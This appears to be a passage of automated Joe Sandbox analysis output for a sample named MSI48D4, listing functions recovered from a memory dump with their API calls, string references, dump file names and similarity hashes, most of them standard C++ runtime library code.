GetCurrentProcess.KERNEL32(0EAD22C0,0EAD22C0,?,?,00000000,00C54981,000000FF), ref: 00C162EB

Part of subcall function 00C32C98: EnterCriticalSection.KERNEL32(00C6DD3C,?,?,?,00C123B6,00C6E638,0EAD22C0,?,?,00C53D6D,000000FF), ref: 00C32CA3
Part of subcall function 00C32C98: LeaveCriticalSection.KERNEL32(00C6DD3C,?,?,?,00C123B6,00C6E638,0EAD22C0,?,?,00C53D6D,000000FF), ref: 00C32CE0

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00C162B0
GetProcAddress.KERNEL32(00000000), ref: 00C162B7

Part of subcall function 00C32C4E: EnterCriticalSection.KERNEL32(00C6DD3C,?,?,00C12427,00C6E638,00C56B40), ref: 00C32C58
Part of subcall function 00C32C4E: LeaveCriticalSection.KERNEL32(00C6DD3C,?,?,00C12427,00C6E638,00C56B40), ref: 00C32C8B
Part of subcall function 00C32C4E: RtlWakeAllConditionVariable.NTDLL ref: 00C32D02

Strings

IsWow64Process, xrefs: 00C162A6
kernel32, xrefs: 00C162AB

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
String ID: IsWow64Process$kernel32
API String ID: 1333104975-3789238822
Opcode ID: e4117d60b990087e651e71bcda9066b66ffbcbe50aae6c25c5d3f6382fcbe79a
Instruction ID: d38d3693061c3757f6ff0ed59301fa7db09766b392a9d72af1c3e7eecd0173c0
Opcode Fuzzy Hash: e4117d60b990087e651e71bcda9066b66ffbcbe50aae6c25c5d3f6382fcbe79a
Instruction Fuzzy Hash: D3213A75D44709DFDB20EF94ED46B9D77B8FB15B10F100226F921A32D0D7B49540EA51

Function 00C28451 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C28458
_Getvals.LIBCPMT ref: 00C284AA
_Mpunct.LIBCPMT ref: 00C284E5
_Mpunct.LIBCPMT ref: 00C284FF

Strings

$+xv, xrefs: 00C2850A

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Mpunct$GetvalsH_prolog3
String ID: $+xv
API String ID: 2204710431-1686923651
Opcode ID: 219f7f4653017de7923a5ff8035671c0461993e76e652195462275882a8eaae6
Instruction ID: 144e7c4e7b2b2d56d0ed1b4303621e7756d847a41e0725e8adcd4cf91ec161a7
Opcode Fuzzy Hash: 219f7f4653017de7923a5ff8035671c0461993e76e652195462275882a8eaae6
Instruction Fuzzy Hash: 9121C4B1900BA26FDB25EF78949077BBEF8AB08300F04451AF459C7E42D734E605DBA0

Function 00C16250 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62libraryloaderCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0EAD22C0,0EAD22C0,?,?,00000000,00C54981,000000FF), ref: 00C162EB

Part of subcall function 00C32C98: EnterCriticalSection.KERNEL32(00C6DD3C,?,?,?,00C123B6,00C6E638,0EAD22C0,?,?,00C53D6D,000000FF), ref: 00C32CA3
Part of subcall function 00C32C98: LeaveCriticalSection.KERNEL32(00C6DD3C,?,?,?,00C123B6,00C6E638,0EAD22C0,?,?,00C53D6D,000000FF), ref: 00C32CE0

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00C162B0
GetProcAddress.KERNEL32(00000000), ref: 00C162B7

Part of subcall function 00C32C4E: EnterCriticalSection.KERNEL32(00C6DD3C,?,?,00C12427,00C6E638,00C56B40), ref: 00C32C58
Part of subcall function 00C32C4E: LeaveCriticalSection.KERNEL32(00C6DD3C,?,?,00C12427,00C6E638,00C56B40), ref: 00C32C8B
Part of subcall function 00C32C4E: RtlWakeAllConditionVariable.NTDLL ref: 00C32D02

Strings

IsWow64Process, xrefs: 00C162A6
kernel32, xrefs: 00C162AB

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
String ID: IsWow64Process$kernel32
API String ID: 2056477612-3789238822
Opcode ID: 3bbef70e7853e919190311ca37e6678763ac02d769924c285fc9eb992bd98fae
Instruction ID: 938a9510710c79e792f392587c6d462f4285c5af7f8bd24e5a044ed35fa5759d
Opcode Fuzzy Hash: 3bbef70e7853e919190311ca37e6678763ac02d769924c285fc9eb992bd98fae
Instruction Fuzzy Hash: D51103B6D08718DFDB20DF94ED45B9EB3A8F715B20F10032AE821933D0E7B5A940CA51

Function 00C369E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00C36AA3,?,?,00C6DDCC,00000000,?,00C36BCE,00000004,InitializeCriticalSectionEx,00C597E8,InitializeCriticalSectionEx,00000000), ref: 00C36A72

Strings

api-ms-, xrefs: 00C36A32

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: bfd7515b3f19d8dc356c1c105df7e9ba16b60de8821212caa134600d25edd142
Instruction ID: 20deac9ca238de422209d397c36045906a7e2dfc6db2d696422ebda86135110a
Opcode Fuzzy Hash: bfd7515b3f19d8dc356c1c105df7e9ba16b60de8821212caa134600d25edd142
Instruction Fuzzy Hash: 5211A335A14725FBCB228B689C45B5E73A49F01771F14C260FA65FB280D770EE4096D5

Function 00C42DEE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,0EAD22C0,?,?,00000000,00C56A6C,000000FF,?,00C42DC1,?,?,00C42D95,?), ref: 00C42E23
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00C42E35
FreeLibrary.KERNEL32(00000000,?,00000000,00C56A6C,000000FF,?,00C42DC1,?,?,00C42D95,?), ref: 00C42E57

Strings

CorExitProcess, xrefs: 00C42E2D
mscoree.dll, xrefs: 00C42E1C

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 7309a2cbaab5405b626d66c9db85ab3b989c899e232dfce29caf632d89c41184
Instruction ID: 8400ddc559063a8a91630b4c1114e054675fd9c6117cd003dbfe31db9aef597c
Opcode Fuzzy Hash: 7309a2cbaab5405b626d66c9db85ab3b989c899e232dfce29caf632d89c41184
Instruction Fuzzy Hash: 39018B75918719EFDB128F90DC05FAFB7B8FB04B12F044725F811B26A0DB749980CA50

Function 00C46DB9 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00C46E40
__alloca_probe_16.LIBCMT ref: 00C46F01
__freea.LIBCMT ref: 00C46F68

Part of subcall function 00C45BDC: HeapAlloc.KERNEL32(00000000,00000000,00C43841,?,00C4543A,?,00000000,?,00C36CE7,00000000,00C43841,00000000,?,?,?,00C4363B), ref: 00C45C0E

__freea.LIBCMT ref: 00C46F7D
__freea.LIBCMT ref: 00C46F8D

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 517fbea2a59b16870eeef98260bdce9a687a0acffd3fedefe434f0322d4f1d3d
Instruction ID: 73e57d4db5e7c9c5ace7f2517381669a30e61f389438933c9c726bf981745d5e
Opcode Fuzzy Hash: 517fbea2a59b16870eeef98260bdce9a687a0acffd3fedefe434f0322d4f1d3d
Instruction Fuzzy Hash: F351C172A00206AFEF219FA5DC81EBF7AA9FF06750F150128FD18D6255E731CE1497A2

Function 00C1B8B0 Relevance: 7.6, APIs: 5, Instructions: 105COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C1B8DD
std::_Lockit::_Lockit.LIBCPMT ref: 00C1B900
std::_Lockit::~_Lockit.LIBCPMT ref: 00C1B928
std::_Facet_Register.LIBCPMT ref: 00C1B98D
std::_Lockit::~_Lockit.LIBCPMT ref: 00C1B9B7

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 29a279dfd07725c0a8a0360bfdbe5814c3804bb7efc2d61a66f14c17e50ad2a5
Instruction ID: 5c73fde416aaa7fc4d07aa9a5736c8fa5441493fd2aaf41b8388d3a37ab5eca5
Opcode Fuzzy Hash: 29a279dfd07725c0a8a0360bfdbe5814c3804bb7efc2d61a66f14c17e50ad2a5
Instruction Fuzzy Hash: 34315775900218DFCB20DF54D940BADBBB4FF25720F24419AE810673A2D770AE82DB82

Function 00C15890 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,?,75EF4450,00C15646,?,?,?,?,?), ref: 00C15898

Strings

true, xrefs: 00C158A7, 00C158B6
false, xrefs: 00C158A2
Last error=, xrefs: 00C158D9
Call to ShellExecuteEx() returned:, xrefs: 00C158AF

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ErrorLast
String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
API String ID: 1452528299-1782174991
Opcode ID: 4f6493b883ba9d142df9b9f36883cf350409995f229fb075e19ad4fc6fac298f
Instruction ID: 8fd9f7443868d0c8c7006066a279f1fa528bed40dbb5d5672de067e84245e34b
Opcode Fuzzy Hash: 4f6493b883ba9d142df9b9f36883cf350409995f229fb075e19ad4fc6fac298f
Instruction Fuzzy Hash: D2112156B00621C7CB301F6C88503BAA3E4DF82764F65043FD8C9D7391E6B58DC29390

Function 00C21C42 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 00C21C62
_Maklocstr.LIBCPMT ref: 00C21C7F
_Maklocstr.LIBCPMT ref: 00C21C9C
_Maklocchr.LIBCPMT ref: 00C21CAE
_Maklocchr.LIBCPMT ref: 00C21CC1

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Maklocstr$Maklocchr
String ID:
API String ID: 2020259771-0
Opcode ID: 410c7ff4dd536d767b338dfe7bffff310f123e65d427c90c7b81731e1c682db6
Instruction ID: 39991a4f0bd0cf53362e3e897f4727b0807ce75b24d5f914ae39f70dec90a450
Opcode Fuzzy Hash: 410c7ff4dd536d767b338dfe7bffff310f123e65d427c90c7b81731e1c682db6
Instruction Fuzzy Hash: F911BCB1940794BBE720DBA4AC81F22B7ECAF15310F080519FA558BA40C274FD4487A8

Function 00C1D87C Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C1D883
std::_Lockit::_Lockit.LIBCPMT ref: 00C1D88D

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

numpunct.LIBCPMT ref: 00C1D8C7
std::_Facet_Register.LIBCPMT ref: 00C1D8DE
std::_Lockit::~_Lockit.LIBCPMT ref: 00C1D8FE

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
String ID:
API String ID: 743221004-0
Opcode ID: 2c3e3cc566b69b009e74d098cb2662cdf239e4d8e877132c90cfc8f415a86b95
Instruction ID: 990676cb09a8497ad86059e391999131b426935f732773bd40e23fa3aebf3c4f
Opcode Fuzzy Hash: 2c3e3cc566b69b009e74d098cb2662cdf239e4d8e877132c90cfc8f415a86b95
Instruction Fuzzy Hash: 8011E175A00225DFCF14EB60E8517FE7761AF86311F240449E412AB2D2CF709E85AB92

Function 00C2238F Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C22396
std::_Lockit::_Lockit.LIBCPMT ref: 00C223A0

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

codecvt.LIBCPMT ref: 00C223DA
std::_Facet_Register.LIBCPMT ref: 00C223F1
std::_Lockit::~_Lockit.LIBCPMT ref: 00C22411

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 7e3edc94af80097b4b40383fb4385ae36690f000789715f60bd5de1a022fa9f3
Instruction ID: 664043510c44cb92b7c590cea07eed9ad902b9f3c2aecb042838b45cb114c97d
Opcode Fuzzy Hash: 7e3edc94af80097b4b40383fb4385ae36690f000789715f60bd5de1a022fa9f3
Instruction Fuzzy Hash: 2B012275A10129DFCB14FB64E8417BEB7A1AF84710F240409F4117B292CFB48F85EB91

Function 00C224B9 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C224C0
std::_Lockit::_Lockit.LIBCPMT ref: 00C224CA

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

collate.LIBCPMT ref: 00C22504
std::_Facet_Register.LIBCPMT ref: 00C2251B
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2253B

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID:
API String ID: 1007100420-0
Opcode ID: decb222366b2e870cef87d92033414883c30103a57ddbd1be42eaee0a732f273
Instruction ID: a4f9c1a44a4db5dbe2ce3ddba34b9fe8a3b3670643a17b9edc5cfc33cca50b3f
Opcode Fuzzy Hash: decb222366b2e870cef87d92033414883c30103a57ddbd1be42eaee0a732f273
Instruction Fuzzy Hash: 3F012235A00129EBCB19EBA4E8557AE7761AF84720F244409F411AB292CF748F41EB91

Function 00C22424 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2242B
std::_Lockit::_Lockit.LIBCPMT ref: 00C22435

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

collate.LIBCPMT ref: 00C2246F
std::_Facet_Register.LIBCPMT ref: 00C22486
std::_Lockit::~_Lockit.LIBCPMT ref: 00C224A6

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
String ID:
API String ID: 1007100420-0
Opcode ID: c22bc017e07c41af0d18134a55de9d84f42e5e7f39eae332986bcb5e261fb5a4
Instruction ID: 746bbf73579f9ea66d5069bebb1a30c0ef0ab96050d9e4e9c6f7cc4119db5210
Opcode Fuzzy Hash: c22bc017e07c41af0d18134a55de9d84f42e5e7f39eae332986bcb5e261fb5a4
Instruction Fuzzy Hash: EE01C075900225AFCB14FB60E8517BE7761AF85720F240509F4117B292DF749F84EB91

Function 00C225E3 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C225EA
std::_Lockit::_Lockit.LIBCPMT ref: 00C225F4

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

messages.LIBCPMT ref: 00C2262E
std::_Facet_Register.LIBCPMT ref: 00C22645
std::_Lockit::~_Lockit.LIBCPMT ref: 00C22665

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID:
API String ID: 2750803064-0
Opcode ID: d559c62c59731d81e846325b49b3433e9a615ca1242272dc444bb48a5d7d3e4c
Instruction ID: 9c04e306a534f0578e553e9e689380df56044cd125901afca50d9c7738d50981
Opcode Fuzzy Hash: d559c62c59731d81e846325b49b3433e9a615ca1242272dc444bb48a5d7d3e4c
Instruction Fuzzy Hash: 7301D276900169EBCB15EB60E815BBE7761BF84310F24450AF4116B292CFB49F40EB91

Function 00C2254E Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C22555
std::_Lockit::_Lockit.LIBCPMT ref: 00C2255F

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

ctype.LIBCPMT ref: 00C22599
std::_Facet_Register.LIBCPMT ref: 00C225B0
std::_Lockit::~_Lockit.LIBCPMT ref: 00C225D0

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
String ID:
API String ID: 83828444-0
Opcode ID: 31d1b7a77952edba471713b493e6b589292a6e22683e1075b5bd91dd676dda61
Instruction ID: c17c41fd7e63001e226b67d7770a8bb24244347f13b7d4e6f41377320dcbb24c
Opcode Fuzzy Hash: 31d1b7a77952edba471713b493e6b589292a6e22683e1075b5bd91dd676dda61
Instruction Fuzzy Hash: 47012235910229EBCB14EB60E811BAE7761BF84320F24441AF411AB292DF748F84EB91

Function 00C22678 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2267F
std::_Lockit::_Lockit.LIBCPMT ref: 00C22689

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

messages.LIBCPMT ref: 00C226C3
std::_Facet_Register.LIBCPMT ref: 00C226DA
std::_Lockit::~_Lockit.LIBCPMT ref: 00C226FA

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
String ID:
API String ID: 2750803064-0
Opcode ID: b18f7d011d3af6d3190cd62287b1a6afa2372f357210892434b301fba4ef6979
Instruction ID: f195adc04adb4aff7f70c72fbf01248347f38a2301be65bbe80a384064684f14
Opcode Fuzzy Hash: b18f7d011d3af6d3190cd62287b1a6afa2372f357210892434b301fba4ef6979
Instruction Fuzzy Hash: ED0100769101259FCB15EB60E801BAEB761AF84310F24040AF4116B282CF709F41AB91

Function 00C2E8D8 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2E8DF
std::_Lockit::_Lockit.LIBCPMT ref: 00C2E8E9

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

messages.LIBCPMT ref: 00C2E923
std::_Facet_Register.LIBCPMT ref: 00C2E93A
std::_Lockit::~_Lockit.LIBCPMT ref: 00C2E95A

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

